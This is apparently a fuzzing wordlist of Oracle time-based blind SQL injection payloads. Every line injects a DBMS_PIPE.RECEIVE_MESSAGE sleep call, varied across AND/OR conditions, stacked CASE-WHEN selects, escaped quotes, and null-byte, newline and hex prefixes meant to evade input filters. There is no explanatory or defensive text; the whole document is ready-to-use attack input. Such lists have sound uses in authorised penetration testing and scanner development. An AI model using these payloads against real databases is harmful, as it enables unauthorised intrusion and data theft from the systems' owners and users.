1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),10)
1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),10)-- 1337
' AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),10) AND '1337'='1337
') AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),10) AND ('1337'='1337) 
AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),10) AND (1337=1337
 and 1337=dbms_pipe.receive_message(('a'),120)
 and 1337=dbms_pipe.receive_message(('a'),120) -- 
 and 1337=dbms_pipe.receive_message((\'a\'),120)
 and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
 and 1337=dbms_pipe.receive_message((\\'a\\'),120)
 and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
 and 1337=dbms_pipe.receive_message(1,120)
 and 1337=dbms_pipe.receive_message(1,120) -- 
 or 1337=dbms_pipe.receive_message(('a'),120)
 or 1337=dbms_pipe.receive_message(('a'),120) -- 
 or 1337=dbms_pipe.receive_message((\'a\'),120)
 or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
 or 1337=dbms_pipe.receive_message((\\'a\\'),120)
 or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
 or 1337=dbms_pipe.receive_message(1,120)
 or 1337=dbms_pipe.receive_message(1,120) -- 
%00 and 1337=dbms_pipe.receive_message(('a'),120)
%00 and 1337=dbms_pipe.receive_message(('a'),120) -- 
%00 and 1337=dbms_pipe.receive_message((\'a\'),120)
%00 and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
%00 and 1337=dbms_pipe.receive_message((\\'a\\'),120)
%00 and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
%00 and 1337=dbms_pipe.receive_message(1,120)
%00 and 1337=dbms_pipe.receive_message(1,120) -- 
%00 or 1337=dbms_pipe.receive_message(('a'),120)
%00 or 1337=dbms_pipe.receive_message(('a'),120) -- 
%00 or 1337=dbms_pipe.receive_message((\'a\'),120)
%00 or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
%00 or 1337=dbms_pipe.receive_message((\\'a\\'),120)
%00 or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
%00 or 1337=dbms_pipe.receive_message(1,120)
%00 or 1337=dbms_pipe.receive_message(1,120) -- 
%00' and 1337=dbms_pipe.receive_message(('a'),120) -- 
%00' and 1337=dbms_pipe.receive_message(1,120) -- 
%00' or 1337=dbms_pipe.receive_message(('a'),120) -- 
%00' or 1337=dbms_pipe.receive_message(1,120) -- 
%00';select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual  -- 
%00';select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
%00;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual
%00;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual -- 
%00;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual
%00;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual -- 
%00;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual
%00;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual -- 
%00;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual
%00;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual -- 
%00\' and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
%00\' and 1337=dbms_pipe.receive_message(1,120) -- 
%00\' or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
%00\' or 1337=dbms_pipe.receive_message(1,120) -- 
%00\';select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual  -- 
%00\';select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
%00\\' and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
%00\\' and 1337=dbms_pipe.receive_message(1,120) -- 
%00\\' or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
%00\\' or 1337=dbms_pipe.receive_message(1,120) -- 
%00\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message((\\'a\\'),120) else null end from dual  -- 
%00\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
%0a and 1337=dbms_pipe.receive_message(('a'),120)
%0a and 1337=dbms_pipe.receive_message(('a'),120) -- 
%0a and 1337=dbms_pipe.receive_message((\'a\'),120)
%0a and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
%0a and 1337=dbms_pipe.receive_message((\\'a\\'),120)
%0a and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
%0a and 1337=dbms_pipe.receive_message(1,120)
%0a and 1337=dbms_pipe.receive_message(1,120) -- 
%0a or 1337=dbms_pipe.receive_message(('a'),120)
%0a or 1337=dbms_pipe.receive_message(('a'),120) -- 
%0a or 1337=dbms_pipe.receive_message((\'a\'),120)
%0a or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
%0a or 1337=dbms_pipe.receive_message((\\'a\\'),120)
%0a or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
%0a or 1337=dbms_pipe.receive_message(1,120)
%0a or 1337=dbms_pipe.receive_message(1,120) -- 
%0a' and 1337=dbms_pipe.receive_message(('a'),120) -- 
%0a' and 1337=dbms_pipe.receive_message(1,120) -- 
%0a' or 1337=dbms_pipe.receive_message(('a'),120) -- 
%0a' or 1337=dbms_pipe.receive_message(1,120) -- 
%0a';select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual  -- 
%0a';select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
%0a;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual
%0a;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual -- 
%0a;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual
%0a;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual -- 
%0a;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual
%0a;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual -- 
%0a;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual
%0a;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual -- 
%0a\' and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
%0a\' and 1337=dbms_pipe.receive_message(1,120) -- 
%0a\' or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
%0a\' or 1337=dbms_pipe.receive_message(1,120) -- 
%0a\';select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual  -- 
%0a\';select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
%0a\\' and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
%0a\\' and 1337=dbms_pipe.receive_message(1,120) -- 
%0a\\' or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
%0a\\' or 1337=dbms_pipe.receive_message(1,120) -- 
%0a\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message((\\'a\\'),120) else null end from dual  -- 
%0a\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
%0d%0a and 1337=dbms_pipe.receive_message(('a'),120)
%0d%0a and 1337=dbms_pipe.receive_message(('a'),120) -- 
%0d%0a and 1337=dbms_pipe.receive_message((\'a\'),120)
%0d%0a and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
%0d%0a and 1337=dbms_pipe.receive_message((\\'a\\'),120)
%0d%0a and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
%0d%0a and 1337=dbms_pipe.receive_message(1,120)
%0d%0a and 1337=dbms_pipe.receive_message(1,120) -- 
%0d%0a or 1337=dbms_pipe.receive_message(('a'),120)
%0d%0a or 1337=dbms_pipe.receive_message(('a'),120) -- 
%0d%0a or 1337=dbms_pipe.receive_message((\'a\'),120)
%0d%0a or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
%0d%0a or 1337=dbms_pipe.receive_message((\\'a\\'),120)
%0d%0a or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
%0d%0a or 1337=dbms_pipe.receive_message(1,120)
%0d%0a or 1337=dbms_pipe.receive_message(1,120) -- 
%0d%0a' and 1337=dbms_pipe.receive_message(('a'),120) -- 
%0d%0a' and 1337=dbms_pipe.receive_message(1,120) -- 
%0d%0a' or 1337=dbms_pipe.receive_message(('a'),120) -- 
%0d%0a' or 1337=dbms_pipe.receive_message(1,120) -- 
%0d%0a';select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual  -- 
%0d%0a';select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
%0d%0a;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual
%0d%0a;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual -- 
%0d%0a;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual
%0d%0a;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual -- 
%0d%0a;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual
%0d%0a;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual -- 
%0d%0a;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual
%0d%0a;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual -- 
%0d%0a\' and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
%0d%0a\' and 1337=dbms_pipe.receive_message(1,120) -- 
%0d%0a\' or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
%0d%0a\' or 1337=dbms_pipe.receive_message(1,120) -- 
%0d%0a\';select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual  -- 
%0d%0a\';select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
%0d%0a\\' and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
%0d%0a\\' and 1337=dbms_pipe.receive_message(1,120) -- 
%0d%0a\\' or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
%0d%0a\\' or 1337=dbms_pipe.receive_message(1,120) -- 
%0d%0a\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message((\\'a\\'),120) else null end from dual  -- 
%0d%0a\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
' and 1337=dbms_pipe.receive_message(('a'),120) -- 
' and 1337=dbms_pipe.receive_message(1,120) -- 
' or 1337=dbms_pipe.receive_message(('a'),120) -- 
' or 1337=dbms_pipe.receive_message(1,120) -- 
';select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual  -- 
';select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
0x00 and 1337=dbms_pipe.receive_message(('a'),120)
0x00 and 1337=dbms_pipe.receive_message(('a'),120) -- 
0x00 and 1337=dbms_pipe.receive_message((\'a\'),120)
0x00 and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
0x00 and 1337=dbms_pipe.receive_message((\\'a\\'),120)
0x00 and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
0x00 and 1337=dbms_pipe.receive_message(1,120)
0x00 and 1337=dbms_pipe.receive_message(1,120) -- 
0x00 or 1337=dbms_pipe.receive_message(('a'),120)
0x00 or 1337=dbms_pipe.receive_message(('a'),120) -- 
0x00 or 1337=dbms_pipe.receive_message((\'a\'),120)
0x00 or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
0x00 or 1337=dbms_pipe.receive_message((\\'a\\'),120)
0x00 or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
0x00 or 1337=dbms_pipe.receive_message(1,120)
0x00 or 1337=dbms_pipe.receive_message(1,120) -- 
0x00' and 1337=dbms_pipe.receive_message(('a'),120) -- 
0x00' and 1337=dbms_pipe.receive_message(1,120) -- 
0x00' or 1337=dbms_pipe.receive_message(('a'),120) -- 
0x00' or 1337=dbms_pipe.receive_message(1,120) -- 
0x00';select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual  -- 
0x00';select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
0x00;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual
0x00;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual -- 
0x00;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual
0x00;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual -- 
0x00;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual
0x00;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual -- 
0x00;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual
0x00;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual -- 
0x00\' and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
0x00\' and 1337=dbms_pipe.receive_message(1,120) -- 
0x00\' or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
0x00\' or 1337=dbms_pipe.receive_message(1,120) -- 
0x00\';select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual  -- 
0x00\';select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
0x00\\' and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
0x00\\' and 1337=dbms_pipe.receive_message(1,120) -- 
0x00\\' or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
0x00\\' or 1337=dbms_pipe.receive_message(1,120) -- 
0x00\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message((\\'a\\'),120) else null end from dual  -- 
0x00\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
0x0a and 1337=dbms_pipe.receive_message(('a'),120)
0x0a and 1337=dbms_pipe.receive_message(('a'),120) -- 
0x0a and 1337=dbms_pipe.receive_message((\'a\'),120)
0x0a and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
0x0a and 1337=dbms_pipe.receive_message((\\'a\\'),120)
0x0a and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
0x0a and 1337=dbms_pipe.receive_message(1,120)
0x0a and 1337=dbms_pipe.receive_message(1,120) -- 
0x0a or 1337=dbms_pipe.receive_message(('a'),120)
0x0a or 1337=dbms_pipe.receive_message(('a'),120) -- 
0x0a or 1337=dbms_pipe.receive_message((\'a\'),120)
0x0a or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
0x0a or 1337=dbms_pipe.receive_message((\\'a\\'),120)
0x0a or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
0x0a or 1337=dbms_pipe.receive_message(1,120)
0x0a or 1337=dbms_pipe.receive_message(1,120) -- 
0x0a' and 1337=dbms_pipe.receive_message(('a'),120) -- 
0x0a' and 1337=dbms_pipe.receive_message(1,120) -- 
0x0a' or 1337=dbms_pipe.receive_message(('a'),120) -- 
0x0a' or 1337=dbms_pipe.receive_message(1,120) -- 
0x0a';select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual  -- 
0x0a';select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
0x0a;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual
0x0a;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual -- 
0x0a;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual
0x0a;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual -- 
0x0a;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual
0x0a;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual -- 
0x0a;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual
0x0a;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual -- 
0x0a\' and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
0x0a\' and 1337=dbms_pipe.receive_message(1,120) -- 
0x0a\' or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
0x0a\' or 1337=dbms_pipe.receive_message(1,120) -- 
0x0a\';select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual  -- 
0x0a\';select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
0x0a\\' and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
0x0a\\' and 1337=dbms_pipe.receive_message(1,120) -- 
0x0a\\' or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
0x0a\\' or 1337=dbms_pipe.receive_message(1,120) -- 
0x0a\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message((\\'a\\'),120) else null end from dual  -- 
0x0a\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
0x0d0a and 1337=dbms_pipe.receive_message(('a'),120)
0x0d0a and 1337=dbms_pipe.receive_message(('a'),120) -- 
0x0d0a and 1337=dbms_pipe.receive_message((\'a\'),120)
0x0d0a and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
0x0d0a and 1337=dbms_pipe.receive_message((\\'a\\'),120)
0x0d0a and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
0x0d0a and 1337=dbms_pipe.receive_message(1,120)
0x0d0a and 1337=dbms_pipe.receive_message(1,120) -- 
0x0d0a or 1337=dbms_pipe.receive_message(('a'),120)
0x0d0a or 1337=dbms_pipe.receive_message(('a'),120) -- 
0x0d0a or 1337=dbms_pipe.receive_message((\'a\'),120)
0x0d0a or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
0x0d0a or 1337=dbms_pipe.receive_message((\\'a\\'),120)
0x0d0a or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
0x0d0a or 1337=dbms_pipe.receive_message(1,120)
0x0d0a or 1337=dbms_pipe.receive_message(1,120) -- 
0x0d0a' and 1337=dbms_pipe.receive_message(('a'),120) -- 
0x0d0a' and 1337=dbms_pipe.receive_message(1,120) -- 
0x0d0a' or 1337=dbms_pipe.receive_message(('a'),120) -- 
0x0d0a' or 1337=dbms_pipe.receive_message(1,120) -- 
0x0d0a';select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual  -- 
0x0d0a';select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
0x0d0a;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual
0x0d0a;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual -- 
0x0d0a;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual
0x0d0a;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual -- 
0x0d0a;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual
0x0d0a;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual -- 
0x0d0a;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual
0x0d0a;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual -- 
0x0d0a\' and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
0x0d0a\' and 1337=dbms_pipe.receive_message(1,120) -- 
0x0d0a\' or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
0x0d0a\' or 1337=dbms_pipe.receive_message(1,120) -- 
0x0d0a\';select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual  -- 
0x0d0a\';select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
0x0d0a\\' and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
0x0d0a\\' and 1337=dbms_pipe.receive_message(1,120) -- 
0x0d0a\\' or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
0x0d0a\\' or 1337=dbms_pipe.receive_message(1,120) -- 
0x0d0a\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message((\\'a\\'),120) else null end from dual  -- 
0x0d0a\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual
;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual -- 
;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual
;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual -- 
;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual
;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual -- 
;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual
;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual -- 
\' and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
\' and 1337=dbms_pipe.receive_message(1,120) -- 
\' or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
\' or 1337=dbms_pipe.receive_message(1,120) -- 
\';select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual  -- 
\';select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
\\' and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
\\' and 1337=dbms_pipe.receive_message(1,120) -- 
\\' or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
\\' or 1337=dbms_pipe.receive_message(1,120) -- 
\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message((\\'a\\'),120) else null end from dual  -- 
\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
\\n and 1337=dbms_pipe.receive_message(('a'),120)
\\n and 1337=dbms_pipe.receive_message(('a'),120) -- 
\\n and 1337=dbms_pipe.receive_message((\\'a\\'),120)
\\n and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
\\n and 1337=dbms_pipe.receive_message(1,120)
\\n and 1337=dbms_pipe.receive_message(1,120) -- 
\\n or 1337=dbms_pipe.receive_message(('a'),120)
\\n or 1337=dbms_pipe.receive_message(('a'),120) -- 
\\n or 1337=dbms_pipe.receive_message((\\'a\\'),120)
\\n or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
\\n or 1337=dbms_pipe.receive_message(1,120)
\\n or 1337=dbms_pipe.receive_message(1,120) -- 
\\n' and 1337=dbms_pipe.receive_message(('a'),120) -- 
\\n' and 1337=dbms_pipe.receive_message(1,120) -- 
\\n' or 1337=dbms_pipe.receive_message(('a'),120) -- 
\\n' or 1337=dbms_pipe.receive_message(1,120) -- 
\\n';select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual  -- 
\\n';select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
\\n;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual
\\n;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual -- 
\\n;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual
\\n;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual -- 
\\n;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual
\\n;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual -- 
\\n;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual
\\n;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual -- 
\\n\\' and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
\\n\\' and 1337=dbms_pipe.receive_message(1,120) -- 
\\n\\' or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
\\n\\' or 1337=dbms_pipe.receive_message(1,120) -- 
\\n\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message((\\'a\\'),120) else null end from dual  -- 
\\n\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
\\r\\n and 1337=dbms_pipe.receive_message(('a'),120)
\\r\\n and 1337=dbms_pipe.receive_message(('a'),120) -- 
\\r\\n and 1337=dbms_pipe.receive_message((\\'a\\'),120)
\\r\\n and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
\\r\\n and 1337=dbms_pipe.receive_message(1,120)
\\r\\n and 1337=dbms_pipe.receive_message(1,120) -- 
\\r\\n or 1337=dbms_pipe.receive_message(('a'),120)
\\r\\n or 1337=dbms_pipe.receive_message(('a'),120) -- 
\\r\\n or 1337=dbms_pipe.receive_message((\\'a\\'),120)
\\r\\n or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
\\r\\n or 1337=dbms_pipe.receive_message(1,120)
\\r\\n or 1337=dbms_pipe.receive_message(1,120) -- 
\\r\\n' and 1337=dbms_pipe.receive_message(('a'),120) -- 
\\r\\n' and 1337=dbms_pipe.receive_message(1,120) -- 
\\r\\n' or 1337=dbms_pipe.receive_message(('a'),120) -- 
\\r\\n' or 1337=dbms_pipe.receive_message(1,120) -- 
\\r\\n';select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual  -- 
\\r\\n';select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
\\r\\n;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual
\\r\\n;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual -- 
\\r\\n;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual
\\r\\n;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual -- 
\\r\\n;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual
\\r\\n;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual -- 
\\r\\n;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual
\\r\\n;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual -- 
\\r\\n\\' and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
\\r\\n\\' and 1337=dbms_pipe.receive_message(1,120) -- 
\\r\\n\\' or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
\\r\\n\\' or 1337=dbms_pipe.receive_message(1,120) -- 
\\r\\n\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message((\\'a\\'),120) else null end from dual  -- 
\\r\\n\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
\n and 1337=dbms_pipe.receive_message(('a'),120)
\n and 1337=dbms_pipe.receive_message(('a'),120) -- 
\n and 1337=dbms_pipe.receive_message((\'a\'),120)
\n and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
\n and 1337=dbms_pipe.receive_message(1,120)
\n and 1337=dbms_pipe.receive_message(1,120) -- 
\n or 1337=dbms_pipe.receive_message(('a'),120)
\n or 1337=dbms_pipe.receive_message(('a'),120) -- 
\n or 1337=dbms_pipe.receive_message((\'a\'),120)
\n or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
\n or 1337=dbms_pipe.receive_message(1,120)
\n or 1337=dbms_pipe.receive_message(1,120) -- 
\n' and 1337=dbms_pipe.receive_message(('a'),120) -- 
\n' and 1337=dbms_pipe.receive_message(1,120) -- 
\n' or 1337=dbms_pipe.receive_message(('a'),120) -- 
\n' or 1337=dbms_pipe.receive_message(1,120) -- 
\n';select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual  -- 
\n';select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
\n;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual
\n;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual -- 
\n;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual
\n;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual -- 
\n;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual
\n;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual -- 
\n;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual
\n;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual -- 
\n\' and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
\n\' and 1337=dbms_pipe.receive_message(1,120) -- 
\n\' or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
\n\' or 1337=dbms_pipe.receive_message(1,120) -- 
\n\';select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual  -- 
\n\';select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
